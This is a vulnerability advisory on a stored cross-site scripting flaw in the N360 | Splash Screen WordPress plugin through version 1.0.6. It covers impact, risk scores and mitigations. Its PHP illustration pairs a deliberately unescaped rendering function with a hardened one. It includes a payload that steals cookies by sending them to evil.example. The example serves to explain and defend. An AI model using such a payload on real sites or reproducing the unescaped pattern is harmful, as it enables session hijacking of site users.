Impact
The vulnerability is a classic stored cross-site scripting (XSS) flaw: the N360 | Splash Screen plugin fails to neutralize user-supplied input before rendering it in web pages. An attacker who can get a payload into the plugin's stored settings can inject JavaScript that executes, in the origin of the victim site, in the browser of any user who views the affected page, enabling session hijacking, cookie theft, or defacement. The impact falls on the confidentiality and integrity of the site's visitors and of the users who view the plugin's settings; because the script runs with whatever session the viewer holds, a payload rendered in an administrator's browser can act on that administrator's behalf, so a single stored payload can compromise sessions across the whole site.
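The pattern described above, as an added example that is not the plugin's own code: a settings value stored without sanitization and echoed without escaping, beside a hardened version that sanitizes on input and escapes per output context with the WordPress helpers. The option name `n360_splash_message`, the function names and the payload are constructed for illustration; the stand-in definitions at the top exist only so the file runs under the PHP CLI outside WordPress, where core provides the real functions.

```php
<?php
// Added example, not the N360 | Splash Screen plugin's code. Option name,
// function names and the payload are hypothetical.

// Stand-ins so this runs outside WordPress. In a real plugin these come from
// core (get_option, update_option, sanitize_text_field, esc_html, esc_attr).
if (!function_exists('get_option')) {
    $GLOBALS['__wp_options'] = [];
    function get_option(string $name, $default = false) {
        return $GLOBALS['__wp_options'][$name] ?? $default;
    }
    function update_option(string $name, $value): bool {
        $GLOBALS['__wp_options'][$name] = $value;
        return true;
    }
    function sanitize_text_field(string $str): string {
        // Simplified stand-in: strip tags and control characters, trim.
        $str = strip_tags($str);
        $str = preg_replace('/[\x00-\x1F\x7F]/', '', $str);
        return trim($str);
    }
    function esc_html(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
    function esc_attr(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// --- Vulnerable pattern: stored as submitted, echoed as stored -------------
function n360_save_message_vulnerable(string $submitted): void {
    update_option('n360_splash_message', $submitted);           // no sanitization
}
function n360_render_splash_vulnerable(): string {
    $msg = get_option('n360_splash_message', '');
    // Raw value lands in an attribute and in element text: stored XSS.
    return '<div class="n360-splash" title="' . $msg . '">' . $msg . '</div>';
}

// --- Hardened pattern: sanitize on input, escape for each output context ---
function n360_save_message_hardened(string $submitted): void {
    // The save handler in a real plugin should also verify a nonce and the
    // caller's capability before reaching this point.
    update_option('n360_splash_message', sanitize_text_field($submitted));
}
function n360_render_splash_hardened(): string {
    $msg = get_option('n360_splash_message', '');
    // esc_attr() for the attribute context, esc_html() for the text node.
    return '<div class="n360-splash" title="' . esc_attr($msg) . '">' . esc_html($msg) . '</div>';
}

// Constructed payload: breaks out of the title attribute and exfiltrates cookies.
$payload = '"><script>document.location="https://evil.example/?c="+document.cookie</script>';

n360_save_message_vulnerable($payload);
echo "Vulnerable output:\n", n360_render_splash_vulnerable(), "\n\n";

n360_save_message_hardened($payload);
echo "Hardened output:\n", n360_render_splash_hardened(), "\n";
```

Escaping at the point of output is the actual fix; `sanitize_text_field()` on input is defense in depth and does not by itself make arbitrary rendering safe. If the splash content is meant to carry limited markup, `wp_kses_post()` on output is the usual alternative to `esc_html()`.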
Affected Systems
bistromatic's N360 | Splash Screen plugin is vulnerable in all releases up to and including version 1.0.6; no lower bound on the affected range has been established. The plugin is a WordPress add-on that displays front-page splash screens, so any WordPress installation running one of these versions is affected. No official fix has been published, and the vulnerability remains until bistromatic releases a patched version; until then, deactivating the plugin or restricting which accounts can edit its settings are the only mitigations available to site owners.
Risk and Exploitability
The CVSS score of 5.9 places the flaw in the medium-severity range, and the EPSS score of under 1% indicates that automated, in-the-wild exploitation is currently unlikely. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog. An attacker must be able to supply content to the plugin's input fields, which typically requires some level of authenticated access to the site; once the malicious script is stored, it is served to every visitor of the affected page with no further action by the attacker. The root cause is a server-side failure to sanitize or escape stored input, not a check that can be added in the browser, but the damage is limited to users of the affected site.
OpenCVE Enrichment
EUVD